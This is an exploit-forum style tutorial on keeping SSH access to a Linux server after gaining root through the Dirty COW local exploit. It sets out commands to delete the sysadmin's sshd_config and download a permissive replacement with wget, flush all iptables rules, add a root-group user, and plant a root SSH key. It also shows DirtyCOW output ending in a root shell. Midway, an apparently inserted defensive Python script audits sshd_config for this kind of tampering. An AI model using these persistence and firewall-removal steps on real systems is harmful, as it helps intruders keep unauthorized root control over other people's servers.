
Get SSH Access After Rooting the Server

Author: Rednofozi , Published: 15-10-2018
|--------------------------------------------------------------|                                          
|--------------------------------------------------------------|
|[+] Exploit Title: Get SSH Access After Rooting the Server
|[+] Date:14/10/2018
|[+] Exploit Author :Rednofozi
|[+] Tested on: Windows 10 , parrot os
|[+] MY page https://cxsecurity.com/author/Inj3ct0r
|[+] MY page http://www.exploit4arab.org/author/308/Rednofozi
|[+] ME:Rednfozi@yahoo.com
|[+] ME:Rednofozi@hotmail.com
|[+] ME:inj3ct0r@tuta.io
|[+] fb.me :https://www.facebook.com/saeid.hat.3
|--------------------------------------------------------------|
|[+] RHG hackers iran team
################################################################
.. this time I want to share a few tips that some of you may not know. Usually, those who root a server with a localroot such as dirtyc0w, after escalating, add a user and change its password, but then cannot log in over ssh because the ssh port has been changed or password authentication has been turned off (the sysadmin logs in to the server with an auth key). There are also cases where the privilege escalation directly spawns a tty with root id, but adding a user is not possible because access to commands such as iptables, passwd, etc. is restricted.
Okay, let us take the first case first.
dirty cow exploit - run localroot - add user and set password - cannot log in over ssh.
There are two possibilities: password login is not permitted, or ssh is only reachable from certain IPs (iptables rules).
The trick:
......
su firefat
cd /etc/ssh/
rm sshd_config
wget https://raw.githubusercontent.com/linuxsec/pentest/master/sshd.txt -O sshd_config
iptables -F
service ssh restart

........
The commands above delete the ssh configuration the sysadmin made and replace it with the default settings, where password login is allowed and the daemon listens on port 22. iptables -F flushes iptables, i.e. deletes all existing iptables rules. So if, for example, the original rules only allowed certain IPs to log in to ssh, we can now log in to ssh from our own IP.
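From the defender's side, the change just described (sshd_config replaced by a permissive default and the firewall flushed) is easy to catch by comparing the effective sshd_config against the baseline the sysadmin chose. The following is an added example for this page, not code from the original author: it parses the global section of an sshd_config (first occurrence of a directive wins and Match blocks are skipped, as sshd does) and reports every baseline directive whose effective value differs. The baseline values (port 2222, no password auth, no root login) and the two sample configs are assumptions constructed for the example.

```python
"""Audit an sshd_config against a known-good baseline.

Added example for this page (not from the original author).  The baseline
and the two sample configs below are constructed for illustration.
"""
import re

# Settings a sysadmin might have chosen (assumed values, not from the page).
BASELINE = {
    "port": "2222",
    "passwordauthentication": "no",
    "permitrootlogin": "prohibit-password",
}

# Values sshd falls back to when a directive is absent from the file.
SSHD_DEFAULTS = {
    "port": "22",
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
}


def parse_sshd_config(text):
    """Return {directive_lowercase: value} for the global section only.

    Comments and blank lines are ignored, directives inside a Match block are
    skipped, and the first occurrence of a directive wins (sshd semantics).
    """
    settings = {}
    in_match = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            in_match = True          # everything after this is conditional
            continue
        if in_match:
            continue
        settings.setdefault(key, value)
    return settings


def audit_sshd_config(text, baseline=BASELINE):
    """Return [(directive, expected, found)] for every drift from the baseline."""
    effective = parse_sshd_config(text)
    findings = []
    for key, expected in baseline.items():
        found = effective.get(key, SSHD_DEFAULTS.get(key, "<unset>"))
        if found.lower() != expected.lower():
            findings.append((key, expected, found))
    return findings


# Constructed sample: a config that was overwritten with a permissive default.
REPLACED_CONFIG = """\
# replaced file
Port 22
PermitRootLogin yes
PasswordAuthentication yes
UsePAM yes
"""

# Constructed sample: the sysadmin's hardened config, with a Match exception.
HARDENED_CONFIG = """\
Port 2222
PermitRootLogin prohibit-password
PasswordAuthentication no
Match User backup
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for name, cfg in (("replaced", REPLACED_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg))
```

Run against the live file (`audit_sshd_config(open("/etc/ssh/sshd_config").read())`) from a cron job or a file-integrity tool and alert on any non-empty result; pairing it with a check that `iptables -S` still lists the expected rules covers the second half of the trick.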
The first case above is the easiest. The second one is also quite common:
dirty cow exploit - run localroot - add user and set password - cannot log in over ssh - /bin/su denied
For this one we use the following trick.
We escalate on the server with a localroot that directly spawns a tty with root id.
So the process becomes:
exploit - run - root id
log:
./cowroot
Escalation of privileged root privileges from DirtyCow
Backup /usr/bin/passwd to /tmp/bak
Binary size: 30768
Race, this might take time ...
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to recover /tmp/bak
thread stops
thread stops
root@whmdaqu [/home/bugs/public_html/]#

Because our id is now root, we simply follow the commands from the first case: reset sshd_config, flush iptables, add a root-equivalent user.
Now the third case:
exploit - tty with root id - cannot execute passwd, iptables and other commands.
It is possible that access to system commands is limited when we work from that tty.
Log:

root@server [/root]# /usr/sbin/useradd dick -g root -d /home/dick
/usr/sbin/useradd dick -g root -d /home/dick
root@server [/root]# passwd dick
passwd root
root@server [/root]#

Yes, the password prompt does not appear.
This is because access from the tty is limited; even though we have a root id we cannot run the iptables command.
The trick I tried, and which worked:

cd ~
ssh-keygen -t rsa
cp /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
ssh root@localhost

We use SSH access with an auth key. Why localhost, why not use the auth key directly from our own server? Here I assume the target server's firewall is active and only allows SSH access from certain IPs.
After adding the ssh key, the log looks like this:

root@server [~]# ssh root@localhost
ssh dick@localhost
Attempting to create directory /root/perl5
root@server [~]#

It looks the same, but the first prompt is the tty and the second is an ssh shell.
Now that we are no longer subject to the limit on commands such as iptables and passwd, simply follow the steps from the first case.
That is the tutorial; hopefully it is useful.
-----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
# Discovered by : inj3ct0r and Rednofozi

#--tnx to : ReZa CLONER , Moeein Seven. Rednofozi
